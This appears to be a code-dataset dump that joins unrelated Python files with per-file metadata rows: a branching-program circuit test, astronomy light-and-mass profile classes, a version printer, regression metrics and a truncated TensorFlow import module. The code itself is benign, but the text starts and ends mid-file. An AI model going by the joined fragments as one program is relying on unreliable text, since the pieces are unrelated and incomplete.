return [[1,0,7,8,10,11,14,2,3,21,4,5,29,23,6,15,16,30,33,34,37,9,44,13,45,32,47,41,39,12,17,50,25,18,19,54,51,20,42,28,53,27,38,43,22,24,49,26,58,46,31,36,52,40,35,57,59,55,48,56],[0,2,1,4,3,8,9,16,5,6,22,26,14,15,12,13,7,18,17,32,31,40,10,24,23,41,11,28,27,48,49,20,19,51,54,39,38,43,36,35,21,25,46,37,47,45,42,44,29,30,50,33,57,58,34,56,55,52,53,59],[0,3,4,1,2,6,5,17,9,8,23,27,13,12,15,14,18,7,16,20,19,25,24,10,22,21,28,11,26,49,48,32,31,47,55,36,35,46,39,38,41,40,43,42,51,45,37,33,30,29,50,44,53,52,56,34,54,58,57,59],[0,4,3,2,1,9,8,18,6,5,24,28,15,14,13,12,17,16,7,31,32,41,23,22,10,40,27,26,11,30,29,19,20,44,56,38,39,42,35,36,25,21,37,46,33,45,43,51,49,48,50,47,58,57,55,54,34,53,52,59],[0,5,6,9,8,12,15,19,13,14,25,26,1,4,3,2,20,31,32,35,38,42,21,40,41,37,28,27,11,49,30,39,36,52,44,7,18,10,16,17,43,46,22,23,57,50,24,58,29,48,59,53,55,54,51,33,47,34,56,45],[0,6,5,8,9,13,14,20,12,15,21,28,3,2,1,4,19,32,31,36,39,43,25,41,40,46,26,11,27,29,48,38,35,53,51,17,16,23,18,7,42,37,24,10,58,50,22,57,49,30,59,52,34,56,44,47,33,55,54,45]]
def precalculatedId2PermList():
"""Generated in generate_bp_mappings.py"""
return [array([[1,0,0,0,0],[0,1,0,0,0],[0,0,1,0,0],[0,0,0,1,0],[0,0,0,0,1]]),array([[0,1,0,0,0],[0,0,1,0,0],[0,0,0,1,0],[0,0,0,0,1],[1,0,0,0,0]]),array([[0,0,0,0,1],[1,0,0,0,0],[0,1,0,0,0],[0,0,1,0,0],[0,0,0,1,0]]),array([[0,0,1,0,0],[0,0,0,0,1],[0,1,0,0,0],[1,0,0,0,0],[0,0,0,1,0]]),array([[0,0,0,1,0],[0,0,1,0,0],[1,0,0,0,0],[0,0,0,0,1],[0,1,0,0,0]]),array([[0,1,0,0,0],[0,0,0,1,0],[1,0,0,0,0],[0,0,0,0,1],[0,0,1,0,0]]),array([[0,0,1,0,0],[1,0,0,0,0],[0,0,0,0,1],[0,1,0,0,0],[0,0,0,1,0]]),array([[0,0,1,0,0],[0,0,0,1,0],[0,0,0,0,1],[1,0,0,0,0],[0,1,0,0,0]]),array([[0,0,0,0,1],[0,0,0,1,0],[0,1,0,0,0],[1,0,0,0,0],[0,0,1,0,0]]),array([[0,0,0,1,0],[0,0,1,0,0],[0,0,0,0,1],[0,1,0,0,0],[1,0,0,0,0]]),array([[0,0,0,1,0],[1,0,0,0,0],[0,0,1,0,0],[0,1,0,0,0],[0,0,0,0,1]]),array([[1,0,0,0,0],[0,0,0,0,1],[0,0,1,0,0],[0,1,0,0,0],[0,0,0,1,0]]),array([[0,1,0,0,0],[0,0,0,0,1],[0,0,0,1,0],[1,0,0,0,0],[0,0,1,0,0]]),array([[0,0,1,0,0],[0,0,0,0,1],[0,0,0,1,0],[0,1,0,0,0],[1,0,0,0,0]]),array([[0,0,0,0,1],[0,0,0,1,0],[1,0,0,0,0],[0,0,1,0,0],[0,1,0,0,0]]),array([[0,0,0,1,0],[1,0,0,0,0],[0,0,0,0,1],[0,0,1,0,0],[0,1,0,0,0]]),array([[0,0,0,1,0],[0,0,0,0,1],[1,0,0,0,0],[0,1,0,0,0],[0,0,1,0,0]]),array([[0,1,0,0,0],[0,0,0,1,0],[0,0,0,0,1],[0,0,1,0,0],[1,0,0,0,0]]),array([[0,0,0,0,1],[1,0,0,0,0],[0,0,0,1,0],[0,1,0,0,0],[0,0,1,0,0]]),array([[0,0,0,1,0],[0,0,0,0,1],[0,1,0,0,0],[0,0,1,0,0],[1,0,0,0,0]]),array([[0,0,0,0,1],[0,0,1,0,0],[0,0,0,1,0],[1,0,0,0,0],[0,1,0,0,0]]),array([[0,0,0,1,0],[0,1,0,0,0],[1,0,0,0,0],[0,0,1,0,0],[0,0,0,0,1]]),array([[0,0,1,0,0],[0,1,0,0,0],[0,0,0,0,1],[0,0,0,1,0],[1,0,0,0,0]]),array([[0,0,0,0,1],[0,1,0,0,0],[1,0,0,0,0],[0,0,0,1,0],[0,0,1,0,0]]),array([[0,1,0,0,0],[0,0,0,1,0],[0,0,1,0,0],[1,0,0,0,0],[0,0,0,0,1]]),array([[0,0,0,0,1],[1,0,0,0,0],[0,0,1,0,0],[0,0,0,1,0],[0,1,0,0,0]]),array([[1,0,0,0,0],[0,0,1,0,0],[0,0,0,0,1],[0,0,0,1,0],[0,1,0,0,0]]),array([[1,0,0,0,0],[0,1,0,0,0],[0,0,0,1,0],[0,0,0,0,1],[0,0,1,0,0]]),array([[1,0,0,0,0],[0,0,0,1,0],[0,1,0,0,0],[0,0,1,0,0],[0,0,0,0,1]]),array([[1,0,0,0,0],[0,0,0,0,1],[0,1,0,0,0],[0,0,0,1,0],[0,0,1,0,0]]),array([[1,0,0,0,0],[0,1,0,0,0],[0,0,0,0,1],[0,0,1,0,0],[0,0,0,1,0]]),array([[0,1,0,0,0],[0,0,0,0,1],[1,0,0,0,0],[0,0,1,0,0],[0,0,0,1,0]]),array([[0,0,1,0,0],[1,0,0,0,0],[0,0,0,1,0],[0,0,0,0,1],[0,1,0,0,0]]),array([[0,0,1,0,0],[0,0,0,0,1],[1,0,0,0,0],[0,0,0,1,0],[0,1,0,0,0]]),array([[0,0,0,1,0],[0,1,0,0,0],[0,0,0,0,1],[1,0,0,0,0],[0,0,1,0,0]]),array([[0,0,0,0,1],[0,0,1,0,0],[1,0,0,0,0],[0,1,0,0,0],[0,0,0,1,0]]),array([[0,0,0,1,0],[1,0,0,0,0],[0,1,0,0,0],[0,0,0,0,1],[0,0,1,0,0]]),array([[0,0,1,0,0],[1,0,0,0,0],[0,1,0,0,0],[0,0,0,1,0],[0,0,0,0,1]]),array([[0,0,1,0,0],[0,0,0,1,0],[0,1,0,0,0],[0,0,0,0,1],[1,0,0,0,0]]),array([[0,1,0,0,0],[0,0,1,0,0],[0,0,0,0,1],[1,0,0,0,0],[0,0,0,1,0]]),array([[0,0,1,0,0],[0,1,0,0,0],[0,0,0,1,0],[1,0,0,0,0],[0,0,0,0,1]]),array([[0,1,0,0,0],[0,0,0,0,1],[0,0,1,0,0],[0,0,0,1,0],[1,0,0,0,0]]),array([[0,0,0,0,1],[0,1,0,0,0],[0,0,1,0,0],[1,0,0,0,0],[0,0,0,1,0]]),array([[0,0,0,1,0],[0,1,0,0,0],[0,0,1,0,0],[0,0,0,0,1],[1,0,0,0,0]]),array([[0,0,0,0,1],[0,1,0,0,0],[0,0,0,1,0],[0,0,1,0,0],[1,0,0,0,0]]),array([[1,0,0,0,0],[0,0,1,0,0],[0,1,0,0,0],[0,0,0,0,1],[0,0,0,1,0]]),array([[0,1,0,0,0],[0,0,1,0,0],[1,0,0,0,0],[0,0,0,1,0],[0,0,0,0,1]]),array([[0,1,0,0,0],[1,0,0,0,0],[0,0,0,1,0],[0,0,1,0,0],[0,0,0,0,1]]),array([[1,0,0,0,0],[0,0,0,1,0],[0,0,1,0,0],[0,0,0,0,1],[0,1,0,0,0]]),array([[1,0,0,0,0],[0,0,1,0,0],[0,0,0,1,0],[0,1,0,0,0],[0,0,0,0,1]]),array([[1,0,0,0,0],[0,0,0,1,0],[0,0,0,0,1],[0,1,0,0,0],[0,0,1,0,0]]),array([[0,0,0,1,0],[0,0,0,0,1],[0,0,1,0,0],[1,0,0,0,0],[0,1,0,0,0]]),array([[0,0,0,1,0],[0,0,1,0,0],[0,1,0,0,0],[1,0,0,0,0],[0,0,0,0,1]]),array([[0,0,0,0,1],[0,0,1,0,0],[0,1,0,0,0],[0,0,0,1,0],[1,0,0,0,0]]),array([[0,0,1,0,0],[0,0,0,1,0],[1,0,0,0,0],[0,1,0,0,0],[0,0,0,0,1]]),array([[0,0,0,0,1],[0,0,0,1,0],[0,0,1,0,0],[0,1,0,0,0],[1,0,0,0,0]]),array([[0,1,0,0,0],[1,0,0,0,0],[0,0,0,0,1],[0,0,0,1,0],[0,0,1,0,0]]),array([[0,0,1,0,0],[0,1,0,0,0],[1,0,0,0,0],[0,0,0,0,1],[0,0,0,1,0]]),array([[0,1,0,0,0],[1,0,0,0,0],[0,0,1,0,0],[0,0,0,0,1],[0,0,0,1,0]]),array([[1,0,0,0,0],[0,0,0,0,1],[0,0,0,1,0],[0,0,1,0,0],[0,1,0,0,0]])]
if __name__ == '__main__':
#circuit2bp
from itertools import product
from circuit import *
inputLength = 8
inputs = [Input('x') for _ in range(0, inputLength)]
# (-(x0 & x1) & (-x2 & x3)) & ((x4 & x5) & -(x6 & -x7))
crc = Circuit(AndGate(AndGate(NotGate(AndGate(inputs[0], inputs[1])), AndGate(NotGate(inputs[2]), inputs[3])), AndGate(AndGate(inputs[4], inputs[5]),NotGate(AndGate(inputs[6], NotGate(inputs[7]))))))
print('Circuit: %s'%(crc))
bp = BranchingProgram.fromCircuit(crc)
print bp
print 'Branchin Program Instructions:'
print bp.getInstructionString()
print('BranchinProgram testing start...')
for test in list(product([0,1], repeat=inputLength)):
test = list(test)
circuitResult = crc.evaluate(test)
bpResult = bp.evaluate(test)
print 'Input: %s => C: %d, BP: %d, equal?: %s'%(test, circuitResult, bpResult, circuitResult==bpResult)
| 52.535433
| 4,149
| 0.596897
| 3,051
| 13,344
| 2.596853
| 0.114389
| 0.228954
| 0.235895
| 0.201439
| 0.297236
| 0.264294
| 0.24107
| 0.236274
| 0.236274
| 0.236274
| 0
| 0.210214
| 0.116607
| 13,344
| 254
| 4,150
| 52.535433
| 0.46191
| 0.021733
| 0
| 0.058065
| 0
| 0
| 0.034358
| 0
| 0
| 0
| 0
| 0
| 0.03871
| 0
| null | null | 0
| 0.051613
| null | null | 0.03871
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
be24c042e731a8aaf691cc0aa21d6943f26ea6f7
| 19,759
|
py
|
Python
|
autogalaxy/profiles/light_and_mass_profiles.py
|
jonathanfrawley/PyAutoGalaxy
|
55fb44f22ce5490318378dc31596c887d0d2e29b
|
[
"MIT"
] | null | null | null |
autogalaxy/profiles/light_and_mass_profiles.py
|
jonathanfrawley/PyAutoGalaxy
|
55fb44f22ce5490318378dc31596c887d0d2e29b
|
[
"MIT"
] | null | null | null |
autogalaxy/profiles/light_and_mass_profiles.py
|
jonathanfrawley/PyAutoGalaxy
|
55fb44f22ce5490318378dc31596c887d0d2e29b
|
[
"MIT"
] | null | null | null |
from autogalaxy.profiles import light_profiles as lp
from autogalaxy.profiles import mass_profiles as mp
from typing import Tuple
"""
Mass and light profiles describe both mass distributions and light distributions with a single set of parameters. This
means that the light and mass of these profiles are tied together. Galaxy instances interpret these
objects as being both mass and light profiles.
"""
class LightMassProfile:
pass
class EllGaussian(lp.EllGaussian, mp.EllGaussian, LightMassProfile):
def __init__(
self,
centre: Tuple[float, float] = (0.0, 0.0),
elliptical_comps: Tuple[float, float] = (0.0, 0.0),
intensity: float = 0.1,
sigma: float = 0.01,
mass_to_light_ratio: float = 1.0,
):
lp.EllGaussian.__init__(
self,
centre=centre,
elliptical_comps=elliptical_comps,
intensity=intensity,
sigma=sigma,
)
mp.EllGaussian.__init__(
self,
centre=centre,
elliptical_comps=elliptical_comps,
intensity=intensity,
sigma=sigma,
mass_to_light_ratio=mass_to_light_ratio,
)
class EllSersic(lp.EllSersic, mp.EllSersic, LightMassProfile):
def __init__(
self,
centre: Tuple[float, float] = (0.0, 0.0),
elliptical_comps: Tuple[float, float] = (0.0, 0.0),
intensity: float = 0.1,
effective_radius: float = 0.6,
sersic_index: float = 0.6,
mass_to_light_ratio: float = 1.0,
):
lp.EllSersic.__init__(
self,
centre=centre,
elliptical_comps=elliptical_comps,
intensity=intensity,
effective_radius=effective_radius,
sersic_index=sersic_index,
)
mp.EllSersic.__init__(
self,
centre=centre,
elliptical_comps=elliptical_comps,
intensity=intensity,
effective_radius=effective_radius,
sersic_index=sersic_index,
mass_to_light_ratio=mass_to_light_ratio,
)
class SphSersic(EllSersic, LightMassProfile):
def __init__(
self,
centre: Tuple[float, float] = (0.0, 0.0),
intensity: float = 0.1,
effective_radius: float = 0.6,
sersic_index: float = 0.6,
mass_to_light_ratio: float = 1.0,
):
"""
The SphSersic mass profile, the mass profiles of the light profiles that are used to fit_normal and
subtract the lens model_galaxy's light.
Parameters
----------
centre
The grid of the origin of the profiles
intensity
Overall flux intensity normalisation in the light profiles (electrons per second)
effective_radius
The radius containing half the light of this model_mapper
mass_to_light_ratio : float
The mass-to-light ratio of the light profiles
"""
EllSersic.__init__(
self,
centre=centre,
elliptical_comps=(0.0, 0.0),
intensity=intensity,
effective_radius=effective_radius,
sersic_index=sersic_index,
mass_to_light_ratio=mass_to_light_ratio,
)
class EllExponential(EllSersic, LightMassProfile):
def __init__(
self,
centre: Tuple[float, float] = (0.0, 0.0),
elliptical_comps: Tuple[float, float] = (0.0, 0.0),
intensity: float = 0.1,
effective_radius: float = 0.6,
mass_to_light_ratio: float = 1.0,
):
"""
The EllExponential mass profile, the mass profiles of the light profiles that are used to fit_normal and
subtract the lens model_galaxy's light.
Parameters
----------
centre
The grid of the origin of the profiles
axis_ratio
Ratio of profiles ellipse's minor and major axes (b/a)
angle
Rotational angle of profiles ellipse counter-clockwise from positive x-axis
intensity
Overall flux intensity normalisation in the light profiles (electrons per second)
effective_radius
The radius containing half the light of this model_mapper
mass_to_light_ratio : float
The mass-to-light ratio of the light profiles
"""
EllSersic.__init__(
self,
centre=centre,
elliptical_comps=elliptical_comps,
intensity=intensity,
effective_radius=effective_radius,
sersic_index=1.0,
mass_to_light_ratio=mass_to_light_ratio,
)
class SphExponential(EllExponential, LightMassProfile):
def __init__(
self,
centre: Tuple[float, float] = (0.0, 0.0),
intensity: float = 0.1,
effective_radius: float = 0.6,
mass_to_light_ratio: float = 1.0,
):
"""
The SphExponential mass profile, the mass profiles of the light profiles that are used to fit_normal and
subtract the lens model_galaxy's light.
Parameters
----------
centre
The grid of the origin of the profiles
intensity
Overall flux intensity normalisation in the light profiles (electrons per second)
effective_radius
The radius containing half the light of this model_mapper
mass_to_light_ratio : float
The mass-to-light ratio of the light profiles
"""
EllExponential.__init__(
self,
centre=centre,
elliptical_comps=(0.0, 0.0),
intensity=intensity,
effective_radius=effective_radius,
mass_to_light_ratio=mass_to_light_ratio,
)
class EllDevVaucouleurs(EllSersic, LightMassProfile):
def __init__(
self,
centre: Tuple[float, float] = (0.0, 0.0),
elliptical_comps: Tuple[float, float] = (0.0, 0.0),
intensity: float = 0.1,
effective_radius: float = 0.6,
mass_to_light_ratio: float = 1.0,
):
"""
The EllDevVaucouleurs mass profile, the mass profiles of the light profiles that are used to fit_normal and
subtract the lens model_galaxy's light.
Parameters
----------
centre
The grid of the origin of the profiles
axis_ratio
Ratio of profiles ellipse's minor and major axes (b/a)
angle
Rotational angle of profiles ellipse counter-clockwise from positive x-axis
intensity
Overall flux intensity normalisation in the light profiles (electrons per second)
effective_radius
The radius containing half the light of this model_mapper
mass_to_light_ratio : float
The mass-to-light ratio of the light profiles
"""
super(EllDevVaucouleurs, self).__init__(
centre=centre,
elliptical_comps=elliptical_comps,
intensity=intensity,
effective_radius=effective_radius,
sersic_index=4.0,
mass_to_light_ratio=mass_to_light_ratio,
)
class SphDevVaucouleurs(EllDevVaucouleurs, LightMassProfile):
def __init__(
self,
centre: Tuple[float, float] = (0.0, 0.0),
intensity: float = 0.1,
effective_radius: float = 0.6,
mass_to_light_ratio: float = 1.0,
):
"""
The SphDevVaucouleurs mass profile, the mass profiles of the light profiles that are used to fit_normal and
subtract the lens model_galaxy's light.
Parameters
----------
centre
The grid of the origin of the profiles
intensity
Overall flux intensity normalisation in the light profiles (electrons per second)
effective_radius
The radius containing half the light of this model_mapper
mass_to_light_ratio : float
The mass-to-light ratio of the light profiles
"""
EllDevVaucouleurs.__init__(
self,
centre=centre,
elliptical_comps=(0.0, 0.0),
intensity=intensity,
effective_radius=effective_radius,
mass_to_light_ratio=mass_to_light_ratio,
)
class EllSersicRadialGradient(
lp.EllSersic, mp.EllSersicRadialGradient, LightMassProfile
):
def __init__(
self,
centre: Tuple[float, float] = (0.0, 0.0),
elliptical_comps: Tuple[float, float] = (0.0, 0.0),
intensity: float = 0.1,
effective_radius: float = 0.6,
sersic_index: float = 0.6,
mass_to_light_ratio: float = 1.0,
mass_to_light_gradient: float = 0.0,
):
"""
Setup a Sersic mass and light profiles.
Parameters
----------
centre
The origin of the profiles
axis_ratio
Ratio of profiles ellipse's minor and major axes (b/a)
angle
Rotational angle of profiles ellipse counter-clockwise from positive x-axis
intensity
Overall flux intensity normalisation in the light profiles (electrons per second)
effective_radius
The radius containing half the light of this model_mapper
sersic_index : Int
The concentration of the light profiles
mass_to_light_ratio : float
The mass-to-light ratio of the light profiles
mass_to_light_gradient : float
The mass-to-light radial gradient.
"""
lp.EllSersic.__init__(
self,
centre=centre,
elliptical_comps=elliptical_comps,
intensity=intensity,
effective_radius=effective_radius,
sersic_index=sersic_index,
)
mp.EllSersicRadialGradient.__init__(
self,
centre=centre,
elliptical_comps=elliptical_comps,
intensity=intensity,
effective_radius=effective_radius,
sersic_index=sersic_index,
mass_to_light_ratio=mass_to_light_ratio,
mass_to_light_gradient=mass_to_light_gradient,
)
class SphSersicRadialGradient(EllSersicRadialGradient, LightMassProfile):
def __init__(
self,
centre: Tuple[float, float] = (0.0, 0.0),
intensity: float = 0.1,
effective_radius: float = 0.6,
sersic_index: float = 0.6,
mass_to_light_ratio: float = 1.0,
mass_to_light_gradient: float = 0.0,
):
"""
Setup a Sersic mass and light profiles.
Parameters
----------
centre
The origin of the profiles
intensity
Overall flux intensity normalisation in the light profiles (electrons per second)
effective_radius
The radius containing half the light of this model_mapper
sersic_index : Int
The concentration of the light profiles
mass_to_light_ratio : float
The mass-to-light ratio of the light profiles
mass_to_light_gradient : float
The mass-to-light radial gradient.
"""
EllSersicRadialGradient.__init__(
self,
centre=centre,
elliptical_comps=(0.0, 0.0),
intensity=intensity,
effective_radius=effective_radius,
sersic_index=sersic_index,
mass_to_light_ratio=mass_to_light_ratio,
mass_to_light_gradient=mass_to_light_gradient,
)
class EllExponentialRadialGradient(EllSersicRadialGradient, LightMassProfile):
def __init__(
self,
centre: Tuple[float, float] = (0.0, 0.0),
elliptical_comps: Tuple[float, float] = (0.0, 0.0),
intensity: float = 0.1,
effective_radius: float = 0.6,
mass_to_light_ratio: float = 1.0,
mass_to_light_gradient: float = 0.0,
):
"""
Setup an Exponential mass and light profiles.
Parameters
----------
centre
The origin of the profiles
axis_ratio
Ratio of profiles ellipse's minor and major axes (b/a)
angle
Rotational angle of profiles ellipse counter-clockwise from positive x-axis
intensity
Overall flux intensity normalisation in the light profiles (electrons per second)
effective_radius
The radius containing half the light of this model_mapper
mass_to_light_ratio : float
The mass-to-light ratio of the light profiles
mass_to_light_gradient : float
The mass-to-light radial gradient.
"""
EllSersicRadialGradient.__init__(
self,
centre=centre,
elliptical_comps=elliptical_comps,
intensity=intensity,
effective_radius=effective_radius,
sersic_index=1.0,
mass_to_light_ratio=mass_to_light_ratio,
mass_to_light_gradient=mass_to_light_gradient,
)
class SphExponentialRadialGradient(SphSersicRadialGradient, LightMassProfile):
def __init__(
self,
centre: Tuple[float, float] = (0.0, 0.0),
intensity: float = 0.1,
effective_radius: float = 0.6,
mass_to_light_ratio: float = 1.0,
mass_to_light_gradient: float = 0.0,
):
"""
Setup an Exponential mass and light profiles.
Parameters
----------
centre
The origin of the profiles
axis_ratio
Ratio of profiles ellipse's minor and major axes (b/a)
angle
Rotational angle of profiles ellipse counter-clockwise from positive x-axis
intensity
Overall flux intensity normalisation in the light profiles (electrons per second)
effective_radius
The radius containing half the light of this model_mapper
mass_to_light_ratio : float
The mass-to-light ratio of the light profiles
mass_to_light_gradient : float
The mass-to-light radial gradient.
"""
SphSersicRadialGradient.__init__(
self,
centre=centre,
intensity=intensity,
effective_radius=effective_radius,
sersic_index=1.0,
mass_to_light_ratio=mass_to_light_ratio,
mass_to_light_gradient=mass_to_light_gradient,
)
class EllSersicCore(lp.EllSersicCore, mp.EllSersicCore, LightMassProfile):
def __init__(
self,
centre: Tuple[float, float] = (0.0, 0.0),
elliptical_comps: Tuple[float, float] = (0.0, 0.0),
effective_radius: float = 0.6,
sersic_index: float = 4.0,
radius_break: float = 0.01,
intensity_break: float = 0.05,
gamma: float = 0.25,
alpha: float = 3.0,
mass_to_light_ratio: float = 1.0,
):
lp.EllSersicCore.__init__(
self,
centre=centre,
elliptical_comps=elliptical_comps,
effective_radius=effective_radius,
sersic_index=sersic_index,
radius_break=radius_break,
intensity_break=intensity_break,
gamma=gamma,
alpha=alpha,
)
mp.EllSersicCore.__init__(
self,
centre=centre,
elliptical_comps=elliptical_comps,
effective_radius=effective_radius,
sersic_index=sersic_index,
radius_break=radius_break,
intensity_break=intensity_break,
gamma=gamma,
alpha=alpha,
mass_to_light_ratio=mass_to_light_ratio,
)
class SphSersicCore(EllSersicCore, LightMassProfile):
def __init__(
self,
centre: Tuple[float, float] = (0.0, 0.0),
effective_radius: float = 0.6,
sersic_index: float = 4.0,
radius_break: float = 0.01,
intensity_break: float = 0.05,
gamma: float = 0.25,
alpha: float = 3.0,
mass_to_light_ratio: float = 1.0,
):
"""
The SphSersic mass profile, the mass profiles of the light profiles that are used to fit_normal and
subtract the lens model_galaxy's light.
Parameters
----------
centre
The grid of the origin of the profiles
intensity
Overall flux intensity normalisation in the light profiles (electrons per second)
effective_radius
The radius containing half the light of this model_mapper
mass_to_light_ratio : float
The mass-to-light ratio of the light profiles
"""
EllSersicCore.__init__(
self,
centre=centre,
elliptical_comps=(0.0, 0.0),
effective_radius=effective_radius,
sersic_index=sersic_index,
radius_break=radius_break,
intensity_break=intensity_break,
gamma=gamma,
alpha=alpha,
mass_to_light_ratio=mass_to_light_ratio,
)
class EllChameleon(lp.EllChameleon, mp.EllChameleon, LightMassProfile):
def __init__(
self,
centre: Tuple[float, float] = (0.0, 0.0),
elliptical_comps: Tuple[float, float] = (0.0, 0.0),
intensity: float = 0.1,
core_radius_0: float = 0.01,
core_radius_1: float = 0.005,
mass_to_light_ratio: float = 1.0,
):
lp.EllChameleon.__init__(
self,
centre=centre,
elliptical_comps=elliptical_comps,
intensity=intensity,
core_radius_0=core_radius_0,
core_radius_1=core_radius_1,
)
mp.EllChameleon.__init__(
self,
centre=centre,
elliptical_comps=elliptical_comps,
intensity=intensity,
core_radius_0=core_radius_0,
core_radius_1=core_radius_1,
mass_to_light_ratio=mass_to_light_ratio,
)
class SphChameleon(EllChameleon, LightMassProfile):
def __init__(
self,
centre: Tuple[float, float] = (0.0, 0.0),
intensity: float = 0.1,
core_radius_0: float = 0.01,
core_radius_1: float = 0.005,
mass_to_light_ratio: float = 1.0,
):
"""
The SphChameleon mass profile, the mass profiles of the light profiles that are used to fit_normal and
subtract the lens model_galaxy's light.
Parameters
----------
centre
The grid of the origin of the profiles
intensity
Overall flux intensity normalisation in the light profiles (electrons per second)
effective_radius
The radius containing half the light of this model_mapper
mass_to_light_ratio : float
The mass-to-light ratio of the light profiles
"""
EllChameleon.__init__(
self,
centre=centre,
elliptical_comps=(0.0, 0.0),
intensity=intensity,
core_radius_0=core_radius_0,
core_radius_1=core_radius_1,
mass_to_light_ratio=mass_to_light_ratio,
)
| 34.303819
| 119
| 0.586113
| 2,195
| 19,759
| 5.021412
| 0.05467
| 0.016512
| 0.086826
| 0.09726
| 0.914625
| 0.914625
| 0.914625
| 0.912357
| 0.909454
| 0.905643
| 0
| 0.021613
| 0.346677
| 19,759
| 575
| 120
| 34.363478
| 0.83221
| 0.298801
| 0
| 0.829851
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.044776
| false
| 0.002985
| 0.008955
| 0
| 0.101493
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
be293cfea674cc1055adae0c7ba54e4a29aa0c66
| 121
|
py
|
Python
|
bin/version.py
|
pyDarkVOS/InarkOS
|
21b57a7f0e5a06d276e18e25ac8c30232eb0d8de
|
[
"Apache-2.0"
] | 3
|
2022-02-20T17:22:18.000Z
|
2022-03-20T02:56:07.000Z
|
bin/version.py
|
InarkVOS/InarkOS
|
21b57a7f0e5a06d276e18e25ac8c30232eb0d8de
|
[
"Apache-2.0"
] | null | null | null |
bin/version.py
|
InarkVOS/InarkOS
|
21b57a7f0e5a06d276e18e25ac8c30232eb0d8de
|
[
"Apache-2.0"
] | 2
|
2022-03-11T13:36:37.000Z
|
2022-03-18T23:47:20.000Z
|
from rich import print
def version():
print("[green]Release[/green] [bold]18.3[/bold] [green]production[/green]")
| 30.25
| 79
| 0.677686
| 17
| 121
| 4.823529
| 0.705882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.028571
| 0.132231
| 121
| 4
| 79
| 30.25
| 0.752381
| 0
| 0
| 0
| 0
| 0.333333
| 0.554622
| 0.394958
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 7
|
076d29a3248b6f10f5547032ff4853ff3ada0fe7
| 1,034
|
py
|
Python
|
src/metrics/regression.py
|
dankiy/mm-ml-2021
|
cd49a1be79d4cbdbb3a7b207162d15fc850f34fb
|
[
"MIT"
] | null | null | null |
src/metrics/regression.py
|
dankiy/mm-ml-2021
|
cd49a1be79d4cbdbb3a7b207162d15fc850f34fb
|
[
"MIT"
] | null | null | null |
src/metrics/regression.py
|
dankiy/mm-ml-2021
|
cd49a1be79d4cbdbb3a7b207162d15fc850f34fb
|
[
"MIT"
] | null | null | null |
import numpy as np
def mse(y_true: np.ndarray, y_pred: np.ndarray) -> float:
"""
Mean squared error
Args:
y_true (np.ndarray): ground-truth values
y_pred (np.ndarray): y_predicted values
Returns:
float: metric value
"""
result = np.mean((y_true - y_pred) ** 2)
return result
def rmse(y_true: np.ndarray, y_pred: np.ndarray) -> float:
"""
Root mean squared error
Args:
y_true (np.ndarray): ground-truth values
y_pred (np.ndarray): y_predicted values
Returns:
float: metric value
"""
result = np.sqrt(np.mean((y_true - y_pred) ** 2))
return result
def r2(y_true: np.ndarray, y_pred: np.ndarray) -> float:
"""
Coefficient of determination
Args:
y_true (np.ndarray): ground-truth values
y_pred (np.ndarray): y_predicted values
Returns:
float: metric value
"""
result = 1 - np.sum((y_true - y_pred) ** 2) / np.sum((y_true - np.mean(y_true)) ** 2) # noqa
return result
| 20.68
| 96
| 0.597679
| 147
| 1,034
| 4.047619
| 0.238095
| 0.181513
| 0.082353
| 0.141176
| 0.823529
| 0.805042
| 0.805042
| 0.805042
| 0.805042
| 0.638655
| 0
| 0.008043
| 0.27853
| 1,034
| 49
| 97
| 21.102041
| 0.789544
| 0.448743
| 0
| 0.3
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.3
| false
| 0
| 0.1
| 0
| 0.7
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
07f8af750b680592e3bff52ada1698cfd25eb642
| 4,066
|
py
|
Python
|
cart_venv/Lib/site-packages/tensorflow_core/_api/v1/saved_model/__init__.py
|
juice1000/Synchronous-vs-Asynchronous-Learning-Tensorflow-
|
654be60f7986ac9bb7ce1d080ddee377c3389f93
|
[
"MIT"
] | 2
|
2019-08-04T20:28:14.000Z
|
2019-10-27T23:26:42.000Z
|
cart_venv/Lib/site-packages/tensorflow_core/_api/v1/saved_model/__init__.py
|
juice1000/Synchronous-vs-Asynchronous-Learning-Tensorflow-
|
654be60f7986ac9bb7ce1d080ddee377c3389f93
|
[
"MIT"
] | null | null | null |
cart_venv/Lib/site-packages/tensorflow_core/_api/v1/saved_model/__init__.py
|
juice1000/Synchronous-vs-Asynchronous-Learning-Tensorflow-
|
654be60f7986ac9bb7ce1d080ddee377c3389f93
|
[
"MIT"
] | 1
|
2020-11-04T03:16:29.000Z
|
2020-11-04T03:16:29.000Z
|
# This file is MACHINE GENERATED! Do not edit.
# Generated by: tensorflow/python/tools/api/generator/create_python_api.py script.
"""Public API for tf.saved_model namespace.
"""
from __future__ import print_function as _print_function
import sys as _sys
from tensorflow._api.v1.saved_model import builder
from tensorflow._api.v1.saved_model import constants
from tensorflow._api.v1.saved_model import experimental
from tensorflow._api.v1.saved_model import loader
from tensorflow._api.v1.saved_model import main_op
from tensorflow._api.v1.saved_model import signature_constants
